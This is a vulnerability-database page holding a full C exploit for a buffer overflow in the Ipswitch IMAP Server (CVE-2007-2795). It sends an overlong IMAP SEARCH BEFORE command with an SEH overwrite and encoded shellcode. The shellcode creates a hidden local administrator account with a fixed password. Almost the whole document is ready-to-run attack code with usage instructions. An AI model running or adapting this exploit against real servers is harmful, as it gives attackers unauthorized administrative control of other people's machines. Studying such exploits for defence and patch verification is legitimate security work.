IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit

2014-07-0100:00:00
Root
www.seebug.org
0.076 Low
EPSS
Percentile
93.5%
JSON
No description provided by source.

                                                /* Ipsbitch.cpp vs Ipswitch IMAP 
 * Tested on: Windows 2000 SP4
 * Ref: CVE-2007-2795
 *
 * Author: Dominic Chell &#60;[email protected]&#62;
 * Found this half written on a VM so decided to finish it.
 *
 * Payload adds a local admin account USER=r00t PASS=r00tr00t!!
 *
 */

#include &#34;stdafx.h&#34;
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;errno.h&#62;
#include &#60;string.h&#62;
#include &#34;winsock2.h&#34;

#pragma comment(lib, &#34;ws2_32&#34;)

#define usage(){ (void)fprintf(stderr, &#34;Ipsbitch vs Ipswitch IMAP &#60;=v9.20\n(C) dmc &#60;[email protected]&#62;\n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n&#34;);}
#define error(e){ (void)fprintf(stderr,&#34;%s\n&#34;,e); return -1;}

// USER=r00t PASS=r00tr00t!!
// Bad Chars = &#39;\x00\x0a\x0d\x0b\x09\x0c\x20&#39;
// Encoded with shikata ga nai
char shellcode[] =
	&#34;\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32&#34;
	&#34;\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4&#34;
	&#34;\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23&#34;
	&#34;\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43&#34;
	&#34;\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11&#34;
	&#34;\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a&#34;
	&#34;\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea&#34;
	&#34;\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6&#34;
	&#34;\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b&#34;
	&#34;\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16&#34;
	&#34;\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4&#34;
	&#34;\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49&#34;
	&#34;\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e&#34;
	&#34;\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21&#34;
	&#34;\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53&#34;;

char *seh = &#34;\xC4\x2A\x02\x75&#34;;
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = &#34;\xeb\x10\x90\x90&#34;;
// short jmp nop nop

int main(int argc, char *argv[])
{
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;

	char user[20], pass[20];
	char payload[2048];
	char recvbuf[1024];
	if(argc &#60; 4)
	{
		usage();
		return 0;
	}

	if((strlen(argv[3])&#60;15) && (strlen(argv[4])&#60;15))
	{
		strncpy(user, argv[3], 14);
		strncpy(pass, argv[4], 14);
		user[14] = &#39;\0&#39;;
		pass[14] = &#39;\0&#39;;
	}
	else {
		usage();
		return 0;
	}

	int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);;

	fprintf(stderr, &#34;Ipsbitch vs Ipswitch IMAP &#60;=v9.20\n(C) dmc &#60;[email protected]&#62;\n\n&#34;);

	char auth[50];
	memset(auth, 0, sizeof(auth));
	memset(recvbuf, 0, sizeof(recvbuf));
	strcat(auth, &#34;0 LOGIN &#34;);
	strcat(auth, user);
	strcat(auth, &#34; &#34;);
	strcat(auth, pass);
	strcat(auth, &#34;\r\n&#34;);
	strcat(auth, &#34;\0&#34;);

	memset(payload, 0, sizeof(payload));
	strcat(payload, &#34;2 SEARCH BEFORE &#34;);
	for(int i=0; i&#60;80; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, nextseh);
	strcat(payload, seh);
	for(int i=0; i&#60;100; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, shellcode);
	for(int i=0; i&#60;300; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, &#34;\r\n&#34;);

	WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error(&#34;Unable to start WSA&#34;);

	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET) error(&#34;[*] socket error&#34;);
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ipaddr);
	server.sin_port=htons(port);	

	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

	select(s+1,NULL,&mask,NULL,&timeout);
	if(FD_ISSET(s,&mask))
		{
			fprintf(stderr, &#34;[*] Connecting to IMAP server\n&#34;);
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Got banner:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, &#34;[*] Authenticating...\n&#34;);
			if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error(&#34;[*] error sending auth payload&#34;);
			memset(auth, 0, sizeof(auth));
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, &#34;[*] Sending SELECT command...\n&#34;);
			if (send(s,&#34;1 SELECT INBOX\r\n&#34;,strlen(&#34;1 SELECT INBOX\r\n&#34;),0)==SOCKET_ERROR) error(&#34;[*] error sending auth payload&#34;);
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			fprintf(stderr, &#34;[*] Sending exploit payload...\n&#34;);
			if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error(&#34;[*] error sending exploit payload&#34;);
			memset(payload, 0, sizeof(payload));
			fprintf(stderr, &#34;[*] Now try USER=r00t PASS=r00tr00t!!\n&#34;);
			return 0;
		}
}

// milw0rm.com [2009-09-14]
0.076 Low
EPSS
Percentile
93.5%
JSON
Related for SSV:66887